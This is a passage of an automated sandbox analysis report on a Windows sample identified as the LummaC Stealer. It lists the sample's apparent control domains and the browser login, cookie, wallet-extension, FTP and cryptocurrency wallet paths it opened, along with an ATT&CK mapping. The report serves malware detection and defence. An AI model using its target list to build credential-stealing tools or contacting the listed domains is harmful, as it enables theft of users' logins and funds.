              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000003.2010579118.0000000005280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2132645968.000000000023F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6136, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exeString found in binary or memory: %appdata%\Electrum\wallets
              Source: file.exeString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: ExodusWeb3
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2089349102.0000000001646000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2089206820.0000000001642000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6136, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6136, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
